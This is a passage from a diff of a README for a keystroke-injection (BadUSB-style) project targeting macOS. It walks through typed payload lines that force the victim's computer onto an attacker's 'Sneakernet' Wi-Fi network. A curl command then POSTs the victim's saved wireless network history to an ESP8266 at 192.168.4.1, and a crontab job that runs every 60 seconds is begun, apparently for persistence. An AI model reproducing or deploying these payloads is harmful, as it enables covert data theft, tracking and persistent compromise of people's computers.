skickar/DigiTrack/README.md

   - We add the network "Sneakernet" to our trusted network list and connect to it.

 ##  DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H \"Content-Type: text/plain\" --data \"$(networksetup -listpreferredwirelessnetworks en0)\" 192.168.4.1 &");
-  - After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the attacker computer.
+  - After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the esp8266 creating the "Sneakernet" network.
 The & puts the process in the background in case it takes too long, and the -m sets a timer of 10 seconds to prevent it taking too long.
 Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.

 ##  DigiKeyboard.print("export VISUAL=nano; crontab -e");
   - We create a job that will execute every 60 seconds